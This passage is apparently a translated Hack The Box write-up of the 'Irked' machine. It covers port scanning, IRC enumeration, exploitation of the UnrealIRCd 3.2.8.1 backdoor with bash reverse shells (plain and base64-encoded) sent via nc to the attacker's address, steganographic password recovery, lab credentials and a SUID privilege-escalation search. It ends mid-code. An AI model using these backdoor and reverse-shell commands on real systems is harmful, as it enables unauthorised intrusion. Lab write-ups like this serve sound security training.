Open roaris opened 1 month ago
https://developer.mozilla.org/ja/docs/Glossary/IRC
IRC (Internet Relay Chat) is a worldwide chat system that requires an Internet connection and an IRC client that sends and receives messages via an IRC server.
Never heard of it. Does it have anything to do with port 111 being open?
I looked into vulnerabilities in Apache 2.4.10 but found nothing usable.
Accessing /manual/ redirects via meta refresh to /manual/en/index.html and shows the Apache manual.
$ gobuster dir --url http://10.10.10.117 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.117
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/icons/ (Status: 403) [Size: 293]
/manual/ (Status: 200) [Size: 626]
Progress: 44679 / 87665 (50.97%)[ERROR] Get "http://10.10.10.117/097524020X/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/bugreports/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000689/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000649/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/000331/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 51580 / 87665 (58.84%)[ERROR] Get "http://10.10.10.117/36283/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35445/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/36281/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35949/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/36657/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/31339/": dial tcp 10.10.10.117:80: i/o timeout (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/5251/": dial tcp 10.10.10.117:80: i/o timeout (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/5777/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/35456/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://10.10.10.117/32115/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
I limited the search period to before the machine's release date (2018/11/17) and searched for "rpcbind exploit", but couldn't make sense of anything.
Without the date restriction, a writeup for a different machine that uses port 111 came up: https://sanposhiho.com/posts/2020-09-06-qiita-fbb2689111821d99de85/
Copying its command:
$ nmap -p 111 -script=nfs-ls,nfs-statfs,nfs-showmount 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 21:58 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
PORT STATE SERVICE
111/tcp open rpcbind
Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds
Nothing came back.
https://book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind
Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.
$ rpcinfo 10.10.10.117
program version netid address service owner
100000 4 tcp6 ::.0.111 portmapper superuser
100000 3 tcp6 ::.0.111 portmapper superuser
100000 4 udp6 ::.0.111 portmapper superuser
100000 3 udp6 ::.0.111 portmapper superuser
100000 4 tcp 0.0.0.0.0.111 portmapper superuser
100000 3 tcp 0.0.0.0.0.111 portmapper superuser
100000 2 tcp 0.0.0.0.0.111 portmapper superuser
100000 4 udp 0.0.0.0.0.111 portmapper superuser
100000 3 udp 0.0.0.0.0.111 portmapper superuser
100000 2 udp 0.0.0.0.0.111 portmapper superuser
100000 4 local /run/rpcbind.sock portmapper superuser
100000 3 local /run/rpcbind.sock portmapper superuser
100024 1 udp 0.0.0.0.173.17 status 107
100024 1 tcp 0.0.0.0.141.4 status 107
100024 1 udp6 ::.169.42 status 107
100024 1 tcp6 ::.209.177 status 107
Is the address column in IPv6? I have no idea how to read it.
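The address column is a TI-RPC "universal address", and the transport comes from the netid column: tcp/udp rows are IPv4, tcp6/udp6 rows are IPv6, and local rows are Unix sockets. The last two dot-separated numbers are the port as a high byte and a low byte, so 0.0.0.0.0.111 is IPv4 any-address port 111 and ::.209.177 is IPv6 any-address port 209*256+177 = 53681. The owner column is the uid of the process that registered (107 here) or superuser. The following decoder is an added example, not part of this writeup or any linked page; the SAMPLE text is constructed to mirror the listing above with a few rows dropped, and the program numbers for nfs (100003) and mountd (100005) are the standard RPC assignments.

```python
"""Decode the 'address' column of rpcinfo(8) output into host/port pairs.

Added example for this writeup; SAMPLE is constructed to mirror the listing
above (a few rows dropped) and is not captured from the box."""
import ipaddress

SAMPLE = """\
   program version netid     address                service    owner
    100000    4    tcp6      ::.0.111               portmapper superuser
    100000    2    tcp       0.0.0.0.0.111          portmapper superuser
    100000    4    local     /run/rpcbind.sock      portmapper superuser
    100024    1    udp       0.0.0.0.173.17         status     107
    100024    1    tcp       0.0.0.0.141.4          status     107
    100024    1    udp6      ::.169.42              status     107
    100024    1    tcp6      ::.209.177             status     107
"""

# Standard RPC program numbers; if neither is registered there is no NFS to enumerate.
NFS_PROGRAMS = {100003: "nfs", 100005: "mountd"}


def decode_uaddr(uaddr: str) -> tuple[str, int]:
    """Split a TI-RPC universal address '<ip>.<hi>.<lo>' into (ip, hi*256+lo).

    Works for IPv4 ('0.0.0.0.0.111') and IPv6 ('::.209.177') alike, because the
    port bytes are always the last two dot-separated fields."""
    host, hi, lo = uaddr.rsplit(".", 2)
    hi_b, lo_b = int(hi), int(lo)
    if not (0 <= hi_b <= 255 and 0 <= lo_b <= 255):
        raise ValueError(f"port bytes out of range in {uaddr!r}")
    # ip_address() validates the host part and normalises both address families.
    return str(ipaddress.ip_address(host)), hi_b * 256 + lo_b


def parse_rpcinfo(text: str) -> list[dict]:
    """Turn the rpcinfo table into dicts; 'local' rows carry a socket path, not a port."""
    entries = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] == "program":
            continue  # header or blank line
        program, version, netid, address, service = fields[:5]
        owner = fields[5] if len(fields) > 5 else ""
        entry = {"program": int(program), "version": int(version), "netid": netid,
                 "service": service, "owner": owner}
        if netid == "local":
            entry["path"] = address
        else:
            entry["host"], entry["port"] = decode_uaddr(address)
        entries.append(entry)
    return entries


def ports_to_scan(entries: list[dict]) -> dict[str, set[int]]:
    """Collect the non-portmapper TCP/UDP ports rpcbind advertises, keyed by transport."""
    result: dict[str, set[int]] = {}
    for e in entries:
        if e["program"] == 100000 or "port" not in e:
            continue
        transport = "udp" if e["netid"].startswith("udp") else "tcp"
        result.setdefault(transport, set()).add(e["port"])
    return result


def nfs_registered(entries: list[dict]) -> bool:
    """True only if an NFS server or mountd has registered with this portmapper."""
    return any(e["program"] in NFS_PROGRAMS for e in entries)


if __name__ == "__main__":
    parsed = parse_rpcinfo(SAMPLE)
    for e in parsed:
        print(e)
    print("ports:", ports_to_scan(parsed), "nfs:", nfs_registered(parsed))
```

Reading the listing this way also explains why the nfs-* NSE scripts printed nothing: only portmapper (100000) and status (100024, rpc.statd on ephemeral ports 44305/udp, 36100/tcp, 43306/udp6, 53681/tcp6) are registered, and there is no nfs or mountd program to query.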
Stuck, so I looked at https://www.tagnull.de/post/irked/ (there was no Guided Mode). Apparently you scan all ports.
$ nmap -p- 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:16 JST
It never finishes. Since the open port is apparently 6697, I just confirmed it's open and moved on.
$ nmap -p 6697 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:18 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
PORT STATE SERVICE
6697/tcp open ircs-u
Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
Apparently you use an IRC client tool called HexChat, but it looked like it could only be installed on Windows https://hexchat.github.io/downloads.html
So I looked at the official writeup. The official writeup finds port 8067.
$ nmap -p 8067 10.10.10.117
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-25 22:36 JST
Nmap scan report for 10.10.10.117
Host is up (0.17s latency).
PORT STATE SERVICE
8067/tcp open infi-async
Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
Run a command called irssi against port 8067. It wasn't installed, so install it.
$ sudo apt install irssi
$ man irssi
Irssi(1) General Commands Manual Irssi(1)
NAME
Irssi - a modular IRC client for UNIX
SYNOPSIS
irssi [--config=PATH] [--home=PATH] [-dv!?] [-c server] [-p port] [-n nickname] [-w password] [-h hostname]
DESCRIPTION
Irssi is a modular Internet Relay Chat client; it is highly extensible and very secure. Being a fullscreen,
termcap based client with many features, Irssi is easily extensible through scripts and modules.
...
So this is an IRC client too.
irssi -c 10.10.10.117 -p 8067
Running this takes over the terminal.
Typing exit is supposed to get you back, but it didn't.
Irssi v1.4.5 - https://irssi.org 22:43 -!- Irssi: Looking up 10.10.10.117
22:43 -!- Irssi: The following settings were initialized
22:43 real_name
22:43 -!- Irssi: Connecting to 10.10.10.117 [10.10.10.117] port 8067
22:43 Waiting for CAP LS response...
22:43 -!- Irssi: Connection to 10.10.10.117 established
22:43 !irked.htb *** Looking up your hostname...
22:44 !irked.htb *** Couldn't resolve your hostname; using your IP address instead
22:44 -!- Welcome to the ROXnet IRC Network roaris!roaris@10.10.14.50
22:44 -!- Your host is irked.htb, running version Unreal3.2.8.1
22:44 -!- This server was created Mon May 14 2018 at 13:12:50 EDT
22:44 -!- irked.htb Unreal3.2.8.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
22:44 -!- UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32
TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 are supported by this server
22:44 -!- WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+
CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT
STATUSMSG=~&@%+ are supported by this server
22:44 -!- EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server
22:44 -!- There are 1 users and 0 invisible on 1 servers
22:44 -!- 1 unknown connection(s)
22:44 -!- I have 1 clients and 0 servers
22:44 -!- Current Local Users: 1 Max: 1
22:44 -!- Current Global Users: 1 Max: 1
22:44 -!- MOTD File is missing
22:44 -!- Mode change [+iwx] for user roaris
22:44 -!- You may not reregister
[22:45] [roaris(+iwx)] [1:10 (change with ^X)]
Apparently the thing to notice in this output is Unreal3.2.8.1.
There is an IRC daemon called UnrealIRCd.
Incidentally, irssi -c 10.10.10.117 -p 6697
also turned up Unreal3.2.8.1.
Unreal 3.2.8.1 contains a backdoor: CVE-2010-2075
AB;
Whatever command follows that gets executed.
Until now I went straight for a reverse shell, but this time I start with a connectivity check.
$ echo "AB; ping 10.10.14.50" | nc 10.10.10.117 8067
$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
23:04:09.291342 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 70, length 64
23:04:09.291363 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 70, length 64
23:04:10.290579 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 71, length 64
23:04:10.290588 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 71, length 64
23:04:11.291308 IP 10.10.10.117 > 10.10.14.50: ICMP echo request, id 7883, seq 72, length 64
23:04:11.291330 IP 10.10.14.50 > 10.10.10.117: ICMP echo reply, id 7883, seq 72, length 64
Despite the connectivity check succeeding, the reverse shell doesn't execute. Port 6697 doesn't work either.
$ echo "AB; bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | nc 10.10.10.117 8067
The official writeup base64-encodes the command to bypass a filter and targets port 65534, but that didn't work either.
$ echo "bash -i >& /dev/tcp/10.10.14.50/4444 0>&1" | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK
$ echo "AB; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK | base64 -d | bash" | nc 10.10.10.117 65534
After restarting the machine it worked. It did not work without base64 encoding.
$ echo "AB; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41MC80NDQ0IDA+JjEK | base64 -d | bash" | nc 10.10.10.117 8067
:irked.htb NOTICE AUTH :*** Looking up your hostname...
:irked.htb NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
$ nc -lvp 4444
listening on [any] 4444 ...
10.10.10.117: inverse host lookup failed: Unknown host
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.117] 45491
bash: cannot set terminal process group (613): Inappropriate ioctl for device
bash: no job control in this shell
ircd@irked:~/Unreal3.2$
Couldn't read user.txt
ircd@irked:~/Unreal3.2$ ls -al /home
ls -al /home
total 16
drwxr-xr-x 4 root root 4096 Sep 5 2022 .
drwxr-xr-x 21 root root 4096 Sep 8 2022 ..
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 djmardov
drwxr-xr-x 3 ircd root 4096 Sep 5 2022 ircd
ircd@irked:~/Unreal3.2$ ls -al /home/ircd
ls -al /home/ircd
total 16
drwxr-xr-x 3 ircd root 4096 Sep 5 2022 .
drwxr-xr-x 4 root root 4096 Sep 5 2022 ..
lrwxrwxrwx 1 root root 9 Sep 5 2022 .bash_history -> /dev/null
-rw-r--r-- 1 ircd ircd 0 May 14 2018 .bashrc
-rw-r--r-- 1 ircd ircd 66 May 14 2018 .selected_editor
drwx------ 13 ircd ircd 4096 May 25 10:21 Unreal3.2
ircd@irked:~/Unreal3.2$ ls -al /home/djmardov
ls -al /home/djmardov
total 96
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 .
drwxr-xr-x 4 root root 4096 Sep 5 2022 ..
lrwxrwxrwx 1 root root 9 Nov 3 2018 .bash_history -> /dev/null
-rw-r--r-- 1 djmardov djmardov 220 May 11 2018 .bash_logout
-rw-r--r-- 1 djmardov djmardov 3515 May 11 2018 .bashrc
drwx------ 13 djmardov djmardov 4096 Sep 5 2022 .cache
drwx------ 15 djmardov djmardov 4096 Sep 5 2022 .config
drwx------ 3 djmardov djmardov 4096 Sep 5 2022 .dbus
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Desktop
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Documents
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Downloads
drwx------ 3 djmardov djmardov 4096 Sep 5 2022 .gconf
drwx------ 2 djmardov djmardov 4096 Sep 5 2022 .gnupg
-rw------- 1 djmardov djmardov 4706 Nov 3 2018 .ICEauthority
drwx------ 3 djmardov djmardov 4096 Sep 5 2022 .local
drwx------ 4 djmardov djmardov 4096 Sep 5 2022 .mozilla
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Music
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Pictures
-rw-r--r-- 1 djmardov djmardov 675 May 11 2018 .profile
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Public
drwx------ 2 djmardov djmardov 4096 Sep 5 2022 .ssh
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Templates
-rw-r----- 1 root djmardov 33 May 25 10:21 user.txt
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 Videos
ircd@irked:~/Unreal3.2$ cat /home/djmardov/user.txt
cat /home/djmardov/user.txt
cat: /home/djmardov/user.txt: Permission denied
I tried the following but got no clues.
ircd@irked:~$ ls -al /var/www
ls -al /var/www
total 24
drwxr-xr-x 3 root root 4096 May 14 2018 .
drwxr-xr-x 13 root root 4096 May 11 2018 ..
drwxr-xr-x 2 root root 4096 May 15 2018 html
-rw-r--r-- 1 root root 10701 May 11 2018 index.old
ircd@irked:~$ sudo -l
sudo -l
bash: sudo: command not found
ircd@irked:~$ uname -rs
uname -rs
Linux 3.16.0-6-686-pae
Apparently you look in /home/djmardov/Documents.
ircd@irked:/home/djmardov$ ls -al Documents
ls -al Documents
total 12
drwxr-xr-x 2 djmardov djmardov 4096 Sep 5 2022 .
drwxr-xr-x 18 djmardov djmardov 4096 Sep 5 2022 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
lrwxrwxrwx 1 root root 23 Sep 5 2022 user.txt -> /home/djmardov/user.txt
ircd@irked:/home/djmardov$ cat Documents/.backup
cat Documents/.backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
Well, looking at this I still don't know what to do.
steg apparently refers to steganography, hiding information inside an image.
It seems you use the image from port 80. The steghide command can hide information and extract hidden information. The extracted data was written to pass.txt.
$ wget http://10.10.10.117/irked.jpg
$ sudo apt install steghide
$ steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss
wrote extracted data to "pass.txt".
$ cat pass.txt
Kab6h+m+bbp2J:HG
ssh login as djmardov / Kab6h+m+bbp2J:HG. Got user.txt.
$ ssh djmardov@10.10.10.117
The authenticity of host '10.10.10.117 (10.10.10.117)' can't be established.
ED25519 key fingerprint is SHA256:Ej828KWlDpyEOvOxHAspautgmarzw646NS31tX3puFg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.117' (ED25519) to the list of known hosts.
djmardov@10.10.10.117's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$ cat user.txt
2c03fedaeeaec3288ed5d8a962d3a044
The official writeup looks for files with setuid set.
djmardov@irked:~$ find / -type f -perm -4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/sbin/exim4
/usr/sbin/pppd
/usr/bin/chsh
/usr/bin/procmail
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/at
/usr/bin/pkexec
/usr/bin/X
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/viewuser
/sbin/mount.nfs
/bin/su
/bin/mount
/bin/fusermount
/bin/ntfs-3g
/bin/umount
On listing the suid files a file /usr/bin/viewuser is noticed which isn’t present on Debian by default.
it says, but with this many entries, jumping straight to /usr/bin/viewuser is a stretch.
https://sanposhiho.com/posts/2020-03-06-qiita-fe1f4b35cf74f09a6cb8/ uses something called linuxprivchecker, so I try it.
It ran under python2.
djmardov@irked:~$ python3 linuxprivchecker.py > linuxprivchecker.txt
File "linuxprivchecker.py", line 74
print "[+] " + msg
^
SyntaxError: Missing parentheses in call to 'print'
djmardov@irked:~$ python2 linuxprivchecker.py > linuxprivchecker.txt
The output is far too long. In it is a list of files/directories with setuid and setgid set (what does it mean to set setuid/setgid on a directory?)
[+] SUID/SGID Files and Directories
-rwxr-sr-x 1 root mail 13680 Dec 24 2016 /usr/lib/evolution/camel-lock-helper-1.2
-rwxr-sr-x 1 root utmp 13992 Jun 23 2014 /usr/lib/libvte-2.90-9/gnome-pty-helper
-rwxr-sr-x 1 root utmp 13992 Dec 5 2014 /usr/lib/libvte-2.91-0/gnome-pty-helper
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
drwxrwsr-t 2 root lpadmin 4096 Sep 5 2022 /usr/share/ppd/custom
-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4
-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd
-rwxr-sr-x 1 root tty 26240 Mar 29 2015 /usr/bin/wall
-rwxr-sr-x 1 root mail 17880 Nov 18 2017 /usr/bin/lockfile
-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh
-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp
-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at
-rwxr-sr-x 1 root shadow 21964 May 17 2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 9680 Oct 17 2014 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9772 Dec 4 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root ssh 419192 Nov 19 2017 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec
-rwxr-sr-x 1 root mail 13892 Jun 2 2013 /usr/bin/dotlockfile
-rwxr-sr-x 1 root crontab 38844 Jun 7 2015 /usr/bin/crontab
-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X
-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd
-rwxr-sr-x 1 root mlocate 32116 Jun 13 2013 /usr/bin/mlocate
-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn
-rwxr-sr-x 1 root shadow 61232 May 17 2017 /usr/bin/chage
-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser
drwxrwsr-x 10 root staff 4096 Sep 5 2022 /usr/local
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/include
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/etc
drwxrwsr-x 4 root staff 4096 Sep 5 2022 /usr/local/lib
drwxrwsr-x 4 root staff 4096 Sep 5 2022 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/lib/python2.7/site-packages
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 3 root staff 4096 Sep 5 2022 /usr/local/lib/python3.4
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/lib/python3.4/dist-packages
drwxrwsr-x 8 root staff 4096 Sep 5 2022 /usr/local/share
drwxrwsr-x 6 root staff 4096 Sep 5 2022 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/man
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/ca-certificates
drwxrwsr-x 3 root staff 4096 Sep 5 2022 /usr/local/share/emacs
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/emacs/site-lisp
drwxrwsr-x 7 root staff 4096 Sep 5 2022 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/misc
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/share/fonts
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/sbin
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/bin
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/games
drwxrwsr-x 2 root staff 4096 Sep 5 2022 /usr/local/src
drwxr-s--- 2 root dip 4096 May 11 2018 /etc/chatscripts
drwxr-s--- 2 root dip 4096 May 11 2018 /etc/ppp/peers
drwxr-sr-x 29 man root 4096 May 25 10:31 /var/cache/man
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/hu
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/de
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/gl
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ro
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sk
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/fi
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/id
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sl
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/cs
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ja
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/hr
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/es
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/it
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/nl
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/pt
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/el
drwxr-sr-x 2 man root 4096 May 25 10:31 /var/cache/man/da
drwxrwsr-x 2 root mail 4096 May 11 2018 /var/mail
drwxr-s--- 2 Debian-exim adm 4096 May 25 10:26 /var/log/exim4
drwxrwsr-x 2 root staff 4096 Jan 9 2017 /var/local
-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs
-rwxr-sr-x 1 root shadow 34424 May 27 2017 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su
-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount
-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount
-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount
drwxr-sr-x 3 root systemd-journal 60 May 25 10:21 /run/log/journal
drwxr-s--- 2 root systemd-journal 60 May 25 10:21 /run/log/journal/58827ab6b7d24c318344087f9268b9b5
Picking /usr/bin/viewuser out of this is no different from before. You need the intuition to find /usr/bin/viewuser suspicious.
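Two facts make the list mechanical to triage rather than a matter of intuition. First, the drwxrwsr-x entries are setgid directories: new files created inside inherit the directory's group (staff for /usr/local, mail for /var/mail), which is a standard Debian convention and not a privilege path, and setuid on a directory has no effect on Linux, so only regular files matter. Second, a root-owned SUID binary is only interesting if it does something an unprivileged user can influence, and the cheapest signal is an embedded path under a world-writable directory (/tmp, /var/tmp, /dev/shm), which is what strings | grep /tmp/ would surface. The scanner below is an added example, not from linuxprivchecker or the official writeup; the sample bytes it is tested with are constructed, and the writable-prefix list and the "4 printable bytes" strings heuristic are my assumptions.

```python
"""Shortlist setuid/setgid binaries that reference a world-writable path.

Added example for this writeup (not from linuxprivchecker or the official
writeup); the heuristics below are assumptions, not a definition of 'vulnerable'."""
import os
import re
import stat
import sys
from pathlib import Path

# Any local user can create files here, so a root-owned SUID binary that runs
# a program from one of these directories is a root shell for whoever plants it first.
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Same heuristic as strings(1): runs of 4 or more printable ASCII bytes.
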